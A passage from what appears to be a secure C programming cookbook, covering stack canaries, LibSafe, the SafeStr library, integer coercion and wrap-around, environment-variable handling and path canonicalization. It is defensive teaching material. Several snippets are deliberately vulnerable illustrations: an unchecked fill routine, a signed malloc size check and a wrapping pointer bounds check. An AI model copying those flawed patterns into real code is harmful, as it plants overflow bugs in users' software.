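 * the canary that guards whatever would come after it.
 */
struct guarded_buf {
  char          buf[16];
  unsigned long canary;
};

void guarded_init(struct guarded_buf *g) {
  memset(g->buf, 0, sizeof(g->buf));
  g->canary = GUARD_VALUE;
}

/* Simulates a buggy routine that writes n bytes starting at buf without
 * checking n against sizeof(buf). The caller must keep n within
 * sizeof(struct guarded_buf) so that the sketch itself stays in bounds.
 */
void unchecked_fill(struct guarded_buf *g, int ch, size_t n) {
  memset((unsigned char *)g, ch, n);
}

/* The check a protected function would perform just before returning. */
int guarded_intact(const struct guarded_buf *g) {
  return g->canary == GUARD_VALUE;
}
```

Filling exactly sizeof(buf) bytes leaves the canary alone, whereas filling the whole structure changes it, which is the condition under which a protected program would terminate instead of returning.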

When a program is distributed in source form, the developer of the program cannot enforce the use of StackGuard or ProPolice because they are both nonstandard extensions to the GCC compiler. It is the responsibility of the person compiling the program to make use of one of these technologies. On the other hand, although it is rare for Windows programs to be distributed in source form, the /GS compiler flag is a standard part of the Microsoft Visual C++ compiler, and the program's build scripts (whether they are Makefiles, DevStudio project files, or something else entirely) can enforce the use of the flag.

For Linux systems, Avaya Labs' LibSafe technology is not implemented as a compiler extension, but instead takes advantage of a feature of the dynamic loader that causes a dynamic library to be preloaded with every executable. Using LibSafe does not require the source code for the programs it protects, and it can be deployed on a system-wide basis.

LibSafe replaces the implementation of several standard functions that are known to be vulnerable to buffer overflows, such as gets( ), strcpy( ), and scanf( ). Each replacement attempts to compute the maximum possible size of the statically allocated buffer it is asked to write to. It does so with a GCC built-in function that returns the address of the frame pointer, which is normally the first piece of information on the stack after local variables. If an attempt is made to write more than the estimated size of the buffer, the program is terminated.

Unfortunately, there are several problems with the approach taken by LibSafe. First, it cannot accurately compute the size of a buffer; the best it can do is limit the size of the buffer to the difference between the start of the buffer and the frame pointer. Second, LibSafe's protections will not work with programs that were compiled using the -fomit-frame-pointer flag to GCC, an optimization that causes the compiler not to put a frame pointer on the stack. Although relatively useless, this is a popular optimization for programmers to employ. Finally, LibSafe will not work on setuid binaries without static linking or a similar trick.

In addition to providing protection against conventional stack-smashing attacks, the newest versions of LibSafe also provide some protection against format-string attacks (see Recipe 3.2). The format-string protection also requires access to the frame pointer because it attempts to filter out arguments that are not pointers into the heap or the local variables on the stack.

See Also

§ MSDN reference for strsafe.h: http://msdn.microsoft.com/library/en-us/winui/winui/windowsuserinterface/resources/strings/usingstrsafefunctions.asp

§ SafeStr from Zork: http://www.zork.org/safestr/

§ StackGuard from Immunix: http://www.immunix.org/stackguard.html

§ ProPolice from IBM: http://www.trl.ibm.com/projects/security/ssp/

§ LibSafe from Avaya Labs: http://www.research.avayalabs.com/project/libsafe/

§ Netstrings by Dan J. Bernstein: http://cr.yp.to/proto/netstrings.txt

§ Recipe 3.2, Recipe 3.4

3.4. Using the SafeStr Library

Problem

You want an alternative to using the standard C string-manipulation functions to help avoid buffer overflows (see Recipe 3.3), format-string problems (see Recipe 3.2), and the use of unchecked external input.

Solution

Use the SafeStr library, which is available from http://www.zork.org/safestr/.

Discussion

The SafeStr library provides an implementation of dynamically sizable strings in C. In addition, the library also performs reference counting and accounting of the allocated and actual sizes of each string. Any attempt to increase the actual size of a string beyond its allocated size causes the library to increase the allocated size of the string to a size at least as large. Because strings managed by SafeStr ("safe strings") are dynamically sized, safe strings are not a source of potential buffer overflows. (See Recipe 3.3.)

Safe strings use the type safestr_t, which can actually be cast to the normal C-style string type, char *, though we strongly recommend against doing so where it can be avoided. In fact, the only time you should ever cast a safe string to a normal C-style string is for read-only purposes. This is also the only reason why the safestr_t type was designed in a way that allows casting to normal C-style strings.

WARNING

Casting a safe string to a normal C-style string and modifying it using C-style string-manipulation functions or other means defeats the protections and accounting afforded by the SafeStr library.

The SafeStr library provides a rich set of API functions to manipulate the strings it manages. The large number of functions prohibits us from enumerating them all here, but note that the library comes with complete documentation in the form of Unix man pages, HTML, and PDF. Table 3-1 lists the functions that have C equivalents, along with those equivalents.

Table 3-1. SafeStr API functions and equivalents for normal C strings

SafeStr function        C function
safestr_append( )       strcat( )
safestr_nappend( )      strncat( )
safestr_find( )         strstr( )
safestr_copy( )         strcpy( )
safestr_ncopy( )        strncpy( )
safestr_compare( )      strcmp( )
safestr_ncompare( )     strncmp( )
safestr_length( )       strlen( )
safestr_sprintf( )      sprintf( )
safestr_vsprintf( )     vsprintf( )

You can typically create safe strings in any of the following three ways:

SAFESTR_ALLOC( )

Allocates a resizable string with an initial allocation size in bytes as specified by its only argument. The string returned will be an empty string (actual size zero). Normally the size allocated for a string will be larger than the actual size of the string. The library rounds memory allocations up, so if you know that you will need a large string, it is worth allocating it with a large initial allocation size up front to avoid reallocations as the actual string length grows.

SAFESTR_CREATE( )

Creates a resizable string from the normal C-style string passed as its only argument. This is normally the appropriate way to convert a C-style string to a safe string.

SAFESTR_TEMP( )

Creates a temporary resizable string from the normal C-style string passed as its only argument. SAFESTR_CREATE( ) and SAFESTR_TEMP( ) behave similarly, except that a string created by SAFESTR_TEMP( ) will be automatically destroyed by the next SafeStr function that uses it. The only exception is safestr_reference( ), which increments the reference count on the string, allowing it to survive until safestr_release( ) or safestr_free( ) is called to decrement the string's reference count.

People are sometimes confused about when actually to use SAFESTR_TEMP( ), as well as how to use it properly. Use SAFESTR_TEMP( ) when you need to pass a constant string as an argument to a function that is expecting a safestr_t. A perfect example of such a case would be safestr_sprintf( ), which has the following signature:

int safestr_sprintf(safestr_t *output, safestr_t fmt, ...);

The string that specifies the format must be a safe string, but because you should always use constant strings for the format specification (see Recipe 3.2), you should use SAFESTR_TEMP( ). The alternative is to use SAFESTR_CREATE( ) to create the string before calling safestr_sprintf( ), and free it immediately afterward with safestr_free( ).

int       i = 42;
safestr_t fmt, output;

output = SAFESTR_ALLOC(1);

/* Instead of doing this: */
fmt = SAFESTR_CREATE("The value of i is %d.\n");
safestr_sprintf(&output, fmt, i);
safestr_free(fmt);

/* You can do this: */
safestr_sprintf(&output, SAFESTR_TEMP("The value of i is %d.\n"), i);

When using temporary strings, remember that the temporary string will be destroyed automatically after a call to any SafeStr API function except safestr_reference( ), which will increment the string's reference count. If a temporary string's reference count is incremented, the string will then survive any number of API calls until its reference count is decremented to the extent that it will be destroyed. The API functions safestr_release( ) and safestr_free( ) may be used interchangeably to decrement a string's reference count.

For example, if you are writing a function that accepts a safestr_t as an argument (which may or may not be passed as a temporary string) and you will be performing multiple operations on the string, you should increment the string's reference count before operating on it, and decrement it again when you are finished. This will ensure that the string is not prematurely destroyed if a temporary string is passed in to the function.

void some_function(safestr_t *base, safestr_t extra) {
  safestr_reference(extra);
  if (safestr_length(*base) + safestr_length(extra) < 17)
    safestr_append(base, extra);
  safestr_release(extra);
}

In this example, if you omitted the calls to safestr_reference( ) and safestr_release( ), and if extra was a temporary string, the call to safestr_length( ) would cause the string to be destroyed. As a result, the safestr_append( ) call would then be operating on an invalid safestr_t if the combined length of base and extra were less than 17.

Finally, the SafeStr library also tracks the trustworthiness of strings. A string can be either trusted or untrusted. Operations that combine strings result in untrusted strings if any one of the strings involved in the combination is untrusted; otherwise, the result is trusted. There are few places in SafeStr's API where the trustworthiness of a string is tested, but the function safestr_istrusted( ) allows you to test strings yourself.

The strings that result from using SAFESTR_CREATE( ) or SAFESTR_TEMP( ) are untrusted. You can use SAFESTR_TEMP_TRUSTED( ) to create temporary strings that are trusted. The trustworthiness of an existing string can be altered using safestr_trust( ) to make it trusted or safestr_untrust( ) to make it untrusted.

The main reason to track the trustworthiness of a string is to monitor the flow of external inputs. Safe strings created from external data should initially be untrusted. If you later verify the contents of a string, ensuring that it contains nothing dangerous, you can then mark the string as trusted. Whenever you need to use a string to perform some potentially dangerous operation (for example, using a string in a command-line argument to an external program), check the trustworthiness of the string before you use it, and fail appropriately if the string is untrusted.
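
The same bookkeeping can be sketched without the library. The following is a minimal illustration of trust propagation, not SafeStr's implementation: struct tstr and the tstr_*( ) functions are hypothetical names introduced here, and the sketch omits the reference counting and dynamic resizing that SafeStr provides.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical tagged string; this is NOT SafeStr's safestr_t. */
struct tstr {
  char *data;
  int  trusted;   /* nonzero once the contents have been validated */
};

/* Copies s into a new tagged string. Returns 0 on success, -1 on failure. */
int tstr_create(struct tstr *out, const char *s, int trusted) {
  size_t len = strlen(s);

  if (!(out->data = (char *)malloc(len + 1))) return -1;
  memcpy(out->data, s, len + 1);
  out->trusted = trusted;
  return 0;
}

/* Concatenates a and b; the result is trusted only if both inputs are. */
int tstr_concat(struct tstr *out, const struct tstr *a, const struct tstr *b) {
  size_t alen = strlen(a->data), blen = strlen(b->data);

  if (alen > (size_t)-1 - blen - 1) return -1;   /* length would wrap */
  if (!(out->data = (char *)malloc(alen + blen + 1))) return -1;
  memcpy(out->data, a->data, alen);
  memcpy(out->data + alen, b->data, blen + 1);
  out->trusted = a->trusted && b->trusted;
  return 0;
}

/* Gate for a dangerous operation: hands back the bytes only if trusted. */
const char *tstr_use_trusted(const struct tstr *s) {
  return s->trusted ? s->data : NULL;
}

void tstr_destroy(struct tstr *s) {
  free(s->data);
  s->data = NULL;
  s->trusted = 0;
}
```

A caller that builds a command line from a trusted prefix and an unvalidated argument gets an untrusted result, so tstr_use_trusted( ) returns NULL until the argument has been checked and marked as trusted.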

See Also

§ SafeStr: http://www.zork.org/safestr/

§ Recipe 3.2, Recipe 3.3

3.5. Preventing Integer Coercion and Wrap-Around Problems

Problem

When using integer values, it is possible to make values go out of range in ways that are not obvious. In some cases, improperly validated integer values can lead to security problems, particularly when data gets truncated or when it is converted from a signed value to an unsigned value or vice versa. Unfortunately, such conversions often happen behind your back.

Solution

Unfortunately, integer coercion and wrap-around problems currently require you to be diligent.

Best practices for such problems require that you validate any coercion that takes place. To do this, you need to understand the semantics of the library functions you use well enough to know when they may implicitly cast data.

In addition, you should explicitly check for cases where integer data may wrap around. It is particularly important to perform wrap-around checks immediately before using data.

Discussion

Integer type problems are often quite subtle. As a result, they are very difficult to avoid and very difficult to catch unless you are exceedingly careful. There are several different ways that these problems can manifest themselves, but they always boil down to a type mismatch. In the following subsections, we'll illustrate the various classes of integer type errors with examples.

Signed-to-unsigned coercion

Many API functions take only positive values, and programmers often take advantage of that fact. For example, consider the following code excerpt:

if (x < MAX_SIZE) {
  if (!(ptr = (unsigned char *)malloc(x))) abort( );
} else {
  /* Handle the error condition ... */
}

We might test against MAX_SIZE to protect against denial of service problems where an attacker causes us to allocate a large amount of memory. At first glance, the previous code seems to protect against that. Indeed, some people will worry about what happens in the case where someone tries to malloc( ) a negative number of bytes.

It turns out that malloc( )'s argument is of type size_t, which is an unsigned type. As a result, any negative numbers are converted to positive numbers. Therefore, we do not have to worry about allocating a negative number of bytes; it cannot happen.

However, the previous code may still not work correctly. The key to its correct operation is the data type of x. If x is some signed data type, such as an int, and is a negative value, we will end up allocating a large amount of data. For example, if an attacker manages to set x to -1, the call to malloc( ) will try to allocate 4,294,967,295 bytes on platforms where size_t is 32 bits wide, because the hexadecimal representation of that number (0xFFFFFFFF) is the same as the hexadecimal representation of a signed 32-bit -1.

There are a few ways to alleviate this particular problem:

§ You can make sure never to use signed data types. Unfortunately, that is not very practical—particularly when you are using API functions that take both signed and unsigned values. If you try to ensure that all your data is always unsigned, you might end up with an unsigned-to-signed conversion problem when you call a library function that takes a regular int instead of an unsigned int or a size_t.

§ You can check to make sure x is not negative while it is still signed. There is nothing wrong with this solution. Basically, you are always assuming the worst (that the data may be cast), and it might not be.

§ You can cast x to a size_t before you do your testing. This is a good strategy for those who prefer testing data as close as possible to the state in which it is going to be used to prevent an unanticipated change in the meantime. Of course, the cast to an unsigned value might be unanticipated for the many programmers out there who do not know that size_t is not a signed data type. For those people, the second solution makes more sense.

No matter what solution you prefer, you will need to be diligent about conversions that might apply to your data when you perform your bounds checking.
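
The second and third approaches can be sketched as follows. This is an illustration under stated assumptions rather than a drop-in replacement: the function names and the value of MAX_SIZE are ours, x is assumed to arrive as a long, and, unlike the excerpt above, both functions also reject a request for zero bytes and report failure by returning NULL instead of calling abort( ).

```c
#include <stddef.h>
#include <stdlib.h>

#define MAX_SIZE 4096   /* illustrative limit; choose one that suits your program */

/* Second approach: test while x is still signed, so that a negative value
 * is rejected instead of being converted to an enormous size_t.
 */
void *alloc_checked(long x) {
  if (x <= 0 || x >= MAX_SIZE) return NULL;
  return malloc((size_t)x);
}

/* Third approach: convert first, then test the value malloc( ) will see. */
void *alloc_checked_unsigned(long x) {
  size_t n = (size_t)x;   /* -1 becomes the largest possible size_t here */

  if (n == 0 || n >= MAX_SIZE) return NULL;
  return malloc(n);
}
```

Both functions return NULL for -1. The first does so because -1 is less than zero, and the second because the converted value is far larger than MAX_SIZE.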

Unsigned-to-signed coercion

Problems may also occur when an unsigned value gets converted to a signed value. For example, consider the following code:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[ ]) {
  char         foo[ ] = "abcdefghij";
  char         *p = foo + 4;
  unsigned int x = 0xffffffff;

  if (p + x > p + strlen(p)) {
    printf("Buffer overflow!\n");
    return -1;
  }
  printf("%s\n", p + x);
  return 0;
}

The poor programmer who wrote this code is properly preventing reads past the high end of p, but he probably did not realize that the pointer arithmetic can wrap around. On a platform with 32-bit pointers, adding 0xffffffff to p has the same effect as adding a signed -1, so the result of p + x will be the byte of memory immediately preceding the address to which p points.

While this code is a contrived example, this is still a very real problem. For example, say you have an array of fixed-size records. The program might wish to write arbitrary data into a record where the user supplies the record number, and the program might calculate the memory address of the item of interest dynamically by multiplying the record number by the size of a record, and then adding that to the address at which the records begin. Generally, programmers will make sure the item index is not too high, but they may not realize that the index might be too low!

In addition, it is good to remember that array accesses are rewritten as pointer arithmetic. For example, arr[x] can index memory before the start of your array if x is less than 0 once converted to a signed integer.
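
For the record-array scenario described above, a bounds check needs to cover both ends of the range. The following sketch assumes a fixed table of fixed-size records; the names records and record_at( ) and the two size constants are hypothetical.

```c
#include <stddef.h>

#define RECORD_SIZE 32   /* illustrative sizes */
#define NUM_RECORDS 8

static unsigned char records[NUM_RECORDS * RECORD_SIZE];

/* Returns the address of record number idx, or NULL if idx is out of range.
 * idx is signed on purpose, to model a value that arrived through a signed
 * type somewhere along the way.
 */
unsigned char *record_at(long idx) {
  if (idx < 0) return NULL;              /* too low */
  if (idx >= NUM_RECORDS) return NULL;   /* too high */
  return records + (size_t)idx * RECORD_SIZE;
}
```

Only after both tests pass is the index converted to size_t and used in the address computation.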

Size mismatches

You may also encounter problems when an integer type of one size gets converted to an integer type of another size. For example, suppose that you store an unsigned 64-bit quantity in x, then pass x to an operation that takes an unsigned 32-bit quantity. In C, the upper 32 bits will get truncated. Therefore, if you need to check for overflow, you had better do it before the cast happens!
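
A check of that kind might look like the following sketch. The function name narrow_u64_to_u32( ) is our own, and the fixed-width types come from the C99 header stdint.h.

```c
#include <stdint.h>

/* Stores x in *out and returns 0 if x fits in 32 bits; returns -1 (leaving
 * *out untouched) if the conversion would lose the upper 32 bits.
 */
int narrow_u64_to_u32(uint64_t x, uint32_t *out) {
  if (x > UINT32_MAX) return -1;
  *out = (uint32_t)x;
  return 0;
}
```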

Conversely, when there is an implicit coercion from a small value to a large value, remember that the sign bit will probably extend out, which may not be intended. That is, when C converts a signed value to a different-sized signed value, it does not simply start treating the same bits as a signed value. When growing a number, C will make sure that it retains the same value it once had, even if the binary representation is different. When shrinking the value, C may truncate, but even if it does, the sign will be the same as it was before truncation, which may result in an unexpected binary representation.

For example, you might have a string declared as a char *, then want to treat the bytes as integers. Consider the following code:

#include <stdio.h>

int main(int argc, char *argv[ ]) {
  int x = 0;

  if (argc > 1) x += argv[1][0];
  printf("%d\n", x);
  return 0;
}

If argv[1][0] happens to be 0xFF, x will end up -1 instead of 255 on platforms where plain char is a signed type! Even if you declare x to be an unsigned int, you will still end up with x being 0xFFFFFFFF instead of the desired 0xFF, because C converts size before sign. That is, a char will get sign-extended into an int before being coerced into an unsigned int.
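
One common way to get the intended value is to convert the byte to unsigned char before it is widened. The sketch below uses hypothetical function names; widen_signed( ) is included only to show the sign extension for comparison.

```c
/* Returns the first byte of s as a value in the range 0 to 255. */
unsigned int first_byte(const char *s) {
  /* Convert to unsigned char first; the widening that follows then
   * zero-extends instead of sign-extending.
   */
  return (unsigned char)s[0];
}

/* For comparison: what widening produces from a signed char. */
int widen_signed(signed char c) {
  return c;
}
```

With this approach, x += (unsigned char)argv[1][0] in the program above would add 255 for a 0xFF byte regardless of whether plain char is signed.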

Wrap-around

A very similar problem (with the same remediation strategy as those described in previous subsections) occurs when a variable wraps around. For example, when you add 1 to the maximum unsigned value, you will get zero. When you add 1 to the maximum signed value, you will typically get the minimum possible signed value. (Strictly speaking, signed overflow is undefined behavior in C, so you should not rely on any particular result.)
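
An explicit wrap-around check tests the operands before performing the addition, so that the out-of-range result is never computed. Here is a minimal sketch for int and unsigned int; the function names are our own.

```c
#include <limits.h>

/* Each function stores the sum in *sum and returns 0, or returns -1
 * (leaving *sum untouched) if the addition would go out of range.
 */
int add_unsigned_checked(unsigned int a, unsigned int b, unsigned int *sum) {
  if (a > UINT_MAX - b) return -1;
  *sum = a + b;
  return 0;
}

int add_signed_checked(int a, int b, int *sum) {
  if (b > 0 && a > INT_MAX - b) return -1;   /* would exceed INT_MAX */
  if (b < 0 && a < INT_MIN - b) return -1;   /* would fall below INT_MIN */
  *sum = a + b;
  return 0;
}
```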

This problem often crops up when using a high-precision clock. For example, some people use a 32-bit real-time clock, then check to see if one event occurs before another by testing the clock. Of course, if the clock rolls over (a millisecond clock that uses an unsigned 32-bit value will wrap around every 49.71 days or so), the result of your test is likely to be wrong!

In any case, you should be keeping track of wrap-arounds and taking appropriate measures when they occur. Often, when you're using a real-time clock, you can simply use a clock with more precision. For example, recent x86 chips offer the RDTSC instruction, which provides 64 bits of precision. (See Recipe 4.14.)
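
When a wider clock is not available, a different and widely used technique is to compare timestamps by subtracting them instead of comparing them directly. The sketch below assumes a free-running unsigned 32-bit millisecond counter; the function names are hypothetical, and tick_before( ) is only meaningful when the two readings were taken less than 2^31 ticks (just under 25 days at one tick per millisecond) apart.

```c
#include <stdint.h>

/* Ticks elapsed from start to now. Unsigned subtraction is performed
 * modulo 2^32, so the result is correct even if the counter wrapped
 * once between the two readings.
 */
uint32_t ticks_elapsed(uint32_t start, uint32_t now) {
  return now - start;
}

/* Nonzero if reading a was taken before reading b, assuming the two are
 * less than 2^31 ticks apart.
 */
int tick_before(uint32_t a, uint32_t b) {
  return (uint32_t)(a - b) > UINT32_C(0x7FFFFFFF);
}
```

A direct test such as a < b gives the wrong answer when a was read shortly before the counter rolled over and b shortly after; the subtraction-based test does not.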

See Also

Recipe 4.14

3.6. Using Environment Variables Securely

Problem

You need to obtain the value of, alter the value of, or delete an environment variable.

Solution

A process inherits its environment variables from its parent process. While the parent process most often will not do anything to tarnish the environment passed on to its children, your program's environment variables are still external inputs, and you must therefore treat them as such.

The process that parents your own process could be a malicious process that has manipulated the environment in an attempt to confuse your program and exploit that confusion to nefarious ends. As much as possible, it is best to avoid depending on the environment, but we recognize that is not always possible.

Discussion

In the following subsections, we'll look at obtaining the value of an environment variable as well as changing and deleting environment variables.

Obtaining the value of an environment variable

The normal means by which you obtain the value of an environment variable is by calling getenv( ) with the name of the environment variable whose value is to be retrieved. The problem with getenv( ) is that it simply returns a pointer into the environment, rather than returning a copy of the environment variable's value.

If you do not immediately make a copy of the value returned by getenv( ), but instead store the pointer somewhere for later use, you could end up with a dangling pointer or a different value altogether, if the environment is modified between the time that you called getenv( ) and the time you use the pointer it returns.

WARNING

There is a race condition between the time you call getenv( ) and the time you copy the value it returns. Be careful to only manipulate the process environment from a single thread at a time.

Never make any assumptions about the length or the contents of an environment variable's value. It can be extremely dangerous to simply copy the value into a statically allocated buffer or even a dynamically allocated buffer that was not allocated based on the actual size of the environment variable's value. Always compute the size of the environment variable's value yourself, and dynamically allocate a buffer to hold the copy.

Another problem with environment variables is that a malicious program could manipulate the environment so that two or more environment variables with the same name exist in your process's environment. It is easy to detect this situation, but it usually is not worth concerning yourself with it. Most, if not all, implementations of getenv( ) will always return the first occurrence of an environment variable.
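
If you do want to detect duplicates, a simple scan of the environment array is enough. The following sketch uses a hypothetical helper, env_count( ), that takes the array as a parameter so it can be used on environ or on any other NULL-terminated array of "NAME=VALUE" strings.

```c
#include <stddef.h>
#include <string.h>

/* Counts the entries in an environ-style array (NULL-terminated, each
 * entry of the form "NAME=VALUE") whose name is exactly 'name'.
 */
size_t env_count(char *const *envp, const char *name) {
  size_t count = 0, namelen = strlen(name);

  for (; *envp; envp++)
    if (!strncmp(*envp, name, namelen) && (*envp)[namelen] == '=') count++;
  return count;
}
```

On Unix, you would typically declare extern char **environ; and call env_count(environ, "PATH"); a result greater than 1 means the variable appears more than once.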

As a convenience, you can use the function spc_getenv( ), shown in the following code, to obtain the value of an environment variable. It will return a copy of the environment variable's value allocated with strdup( ), which means that you will be responsible for freeing the memory with free( ).

#include <stdlib.h>
#include <string.h>

char *spc_getenv(const char *name) {
  char *value;

  if (!(value = getenv(name))) return 0;
  return strdup(value);
}

Changing the value of an environment variable

The standard C runtime function putenv( ) is normally used to modify the value of an environment variable. In some implementations, putenv( ) can even be used to delete environment variables, but this behavior is nonstandard and therefore is not portable. If you have sanitized the environment as described in Recipe 1.1, and particularly if you use the code in that recipe, using putenv( ) could cause problems because of the way that code manages the memory allocated to the environment. We recommend that you avoid using the putenv( ) function altogether.

Another reason to avoid putenv( ) is that an attacker could have manipulated the environment before spawning your process, in such a way that two or more environment variables share the same name. You want to make certain that changing the value of an environment variable actually changes it. If you use the code from Recipe 1.1, you can be reasonably certain that there is only one environment variable for each name.

Instead of using putenv( ) to modify the value of an environment variable, use spc_putenv( ), shown in the following code. It will properly handle an environment as the code in Recipe 1.1 builds it, as well as an unaltered environment. In addition to modifying the value of an environment variable, spc_putenv( ) is also capable of adding new environment variables.

We have not copied putenv( )'s signature with spc_putenv( ). If you use putenv( ), you must pass it a string of the form "NAME=VALUE". If you use spc_putenv( ), you must pass it two strings; the first string is the name of the environment variable to modify or add, and the second is the value to assign to the environment variable. If an error occurs, spc_putenv( ) will return 0; otherwise, it will return 1.

Note that the following code is not thread-safe. You need to explicitly avoid the possibility of manipulating the environment from two separate threads at the same time.

#include <stdlib.h>
#include <string.h>

static int spc_environ;

int spc_putenv(const char *name, const char *value) {
  int    del = 0, envc, i, mod = -1;
  char   *envptr, **new_environ;
  size_t delsz = 0, envsz = 0, namelen, valuelen;
  extern char **environ;

  /* First compute the amount of memory required for the new environment */
  namelen  = strlen(name);
  valuelen = strlen(value);
  for (envc = 0; environ[envc]; envc++) {
    if (!strncmp(environ[envc], name, namelen) && environ[envc][namelen] == '=') {
      if (mod == -1) mod = envc;
      else {
        del++;
        delsz += strlen(environ[envc]) + 1;
      }
    }
    envsz += strlen(environ[envc]) + 1;
  }
  if (mod == -1) {
    envc++;
    envsz += (namelen + valuelen + 1 + 1);
  } else {
    /* the replacement may be longer than the entry it replaces, so make
     * room for the new entry rather than the old one
     */
    envsz -= strlen(environ[mod]) + 1;
    envsz += (namelen + valuelen + 1 + 1);
  }
  envc  -= del;   /* account for duplicate entries of the same name */
  envsz -= delsz;

  /* allocate memory for the new environment */
  envsz += (sizeof(char *) * (envc + 1));
  if (!(new_environ = (char **)malloc(envsz))) return 0;
  envptr = (char *)new_environ + (sizeof(char *) * (envc + 1));

  /* copy the old environment into the new environment, replacing the named
   * environment variable if it already exists; otherwise, add it at the end.
   */
  for (envc = i = 0; environ[envc]; envc++) {
    /* skip duplicates of the named variable, but keep its first occurrence */
    if (del && envc != mod && !strncmp(environ[envc], name, namelen) &&
        environ[envc][namelen] == '=') continue;
    new_environ[i++] = envptr;
    if (envc != mod) {
      envsz = strlen(environ[envc]);
      memcpy(envptr, environ[envc], envsz + 1);
      envptr += (envsz + 1);
    } else {
      memcpy(envptr, name, namelen);
      memcpy(envptr + namelen + 1, value, valuelen);
      envptr[namelen] = '=';
      envptr[namelen + valuelen + 1] = 0;
      envptr += (namelen + valuelen + 1 + 1);
    }
  }
  if (mod == -1) {
    new_environ[i++] = envptr;
    memcpy(envptr, name, namelen);
    memcpy(envptr + namelen + 1, value, valuelen);
    envptr[namelen] = '=';
    envptr[namelen + valuelen + 1] = 0;
  }
  new_environ[i] = 0;

  /* possibly free the old environment, then replace it with the new one */
  if (spc_environ) free(environ);
  environ = new_environ;
  spc_environ = 1;
  return 1;
}

Deleting an environment variable

The C standard defines no method for deleting an environment variable. Some implementations of putenv( ) will delete environment variables if the assigned value is a zero-length string. Other systems provide implementations of a function called unsetenv( ), but it is not part of standard C and thus is not universally portable.

None of these methods of deleting environment variables take into account the possibility that multiple occurrences of the same environment variable may exist in the environment. Usually, only the first occurrence will be deleted, rather than all of them. The result is that the environment variable won't actually be deleted because getenv( ) will return the next occurrence of the environment variable.

Especially if you use the code from Recipe 1.1 to sanitize the environment, or if you use the code from the previous subsection, you should use spc_delenv( ) to delete an environment variable. The following code for spc_delenv( ) depends on the static variable spc_environ declared at global scope in the spc_putenv( ) code from the previous subsection; the two functions should share the same instance of that variable.

Note that the following code is not thread-safe. You need to explicitly avoid the possibility of manipulating the environment from two separate threads at the same time.

#include <stdlib.h>
#include <string.h>

int spc_delenv(const char *name) {
  int    del = 0, envc, i, idx = -1;
  size_t delsz = 0, envsz = 0, namelen;
  char   *envptr, **new_environ;
  extern int  spc_environ;
  extern char **environ;

  /* first compute the size of the new environment */
  namelen = strlen(name);
  for (envc = 0; environ[envc]; envc++) {
    if (!strncmp(environ[envc], name, namelen) && environ[envc][namelen] == '=') {
      if (idx == -1) idx = envc;
      else {
        del++;
        delsz += strlen(environ[envc]) + 1;
      }
    }
    envsz += strlen(environ[envc]) + 1;
  }
  if (idx == -1) return 1;
  envc  -= del;   /* account for duplicate entries of the same name */
  envsz -= delsz;

  /* allocate memory for the new environment */
  envsz += (sizeof(char *) * (envc + 1));
  if (!(new_environ = (char **)malloc(envsz))) return 0;
  envptr = (char *)new_environ + (sizeof(char *) * (envc + 1));

  /* copy the old environment into the new environment, ignoring any
   * occurrences of the environment variable that we want to delete.
   */
  for (envc = i = 0; environ[envc]; envc++) {
    if (envc == idx || (del && !strncmp(environ[envc], name, namelen) &&
        environ[envc][namelen] == '=')) continue;
    new_environ[i++] = envptr;
    envsz = strlen(environ[envc]);
    memcpy(envptr, environ[envc], envsz + 1);
    envptr += (envsz + 1);
  }
  new_environ[i] = 0;   /* terminate the new environment array */

  /* possibly free the old environment, then replace it with the new one */
  if (spc_environ) free(environ);
  environ = new_environ;
  spc_environ = 1;
  return 1;
}

See Also

Recipe 1.1

3.7. Validating Filenames and Paths

Problem

You need to resolve the path of a file provided by a user to determine the actual file that it refers to on the filesystem.

Solution

On Unix systems, use the function realpath( ) to resolve the canonical name of a file or path. On Windows, use the function GetFullPathName( ) to resolve the canonical name of a file or path.

Discussion

You must be careful when making access decisions for a file. Taking relative pathnames and links into account, it is possible for multiple filenames to refer to the same file. Failure to take this into account when attempting to perform access checks based on filename can have severe consequences.

On the surface, resolving the canonical name of a file or path may appear to be a reasonably simple task to undertake. However, many programmers fail to consider symbolic and hard links. On Windows, links are possible, but they are not as serious an issue as they are on Unix because they are much less frequently used.

Fortunately, most modern Unix systems provide, as part of the standard C runtime, a function called realpath( ) that will properly resolve the canonical name of a file or path, taking relative paths and links into account. Be careful when using realpath( ) because the function is not thread-safe, and the resolved path is stored in a fixed-size buffer that must be at least MAXPATHLEN bytes in size.

WARNING

The function realpath( ) is not thread-safe because it changes the current directory as it resolves the path. On Unix, a process has a single current directory, regardless of how many threads it has, so changing the current directory in one thread will affect all other threads within the process.

The signature for realpath( ) is:

char *realpath(const char *pathname, char resolved_path[MAXPATHLEN]);

This function has the following arguments:

pathname

Path to be resolved.

resolved_path

Buffer into which the resolved path will be written. It must be at least MAXPATHLEN bytes in size. realpath( ) will never write more than that into the buffer, including the NULL-terminating byte.

If the function fails for any reason, the return value will be NULL, and errno will contain an error code indicating the reason for the failure. If the function is successful, a pointer to resolved_path will be returned.
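
The following sketch shows one way to wrap realpath( ) and then use the canonical name in an access decision. It rests on several assumptions of ours: it uses the POSIX constant PATH_MAX from limits.h in place of MAXPATHLEN (falling back to 4096 where PATH_MAX is not defined), and the function names resolve_path( ) and path_is_under( ) are hypothetical.

```c
#define _XOPEN_SOURCE 700   /* request the POSIX declaration of realpath( ) */
#include <limits.h>
#include <stdlib.h>
#include <string.h>

#ifndef PATH_MAX
#define PATH_MAX 4096   /* assumption for systems that do not define it */
#endif

/* Resolves 'path' and returns a heap-allocated copy of the canonical name,
 * or NULL on failure (errno is set by realpath( ) when it fails). The
 * caller frees the result with free( ).
 */
char *resolve_path(const char *path) {
  char   buf[PATH_MAX], *copy;
  size_t len;

  if (!realpath(path, buf)) return NULL;
  len = strlen(buf);
  if (!(copy = (char *)malloc(len + 1))) return NULL;
  memcpy(copy, buf, len + 1);
  return copy;
}

/* Nonzero if the canonical path 'resolved' is 'dir' itself or lies beneath
 * it. Both arguments must already be canonical, and 'dir' must not end in
 * a slash unless it is "/".
 */
int path_is_under(const char *resolved, const char *dir) {
  size_t dirlen = strlen(dir);

  if (strncmp(resolved, dir, dirlen) != 0) return 0;
  if (dirlen == 1 && dir[0] == '/') return 1;
  return resolved[dirlen] == '/' || resolved[dirlen] == '\0';
}
```

Comparing whole path components matters here: a plain prefix test would wrongly treat /var/wwwroot/secret as lying under /var/www.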

On Windows, there is an equivalent function to realpath( ) called GetFullPathName( ) . It will resolve relative paths, link information, and even UNC (Microsoft's Universal Naming Convention) names. The function is more flexible than its Unix counterpart in that it is thread-safe and provides an interface to allow you to dynamically allocate enough memory to hold the resolved canonical path.

The signature for GetFullPathName( ) is:

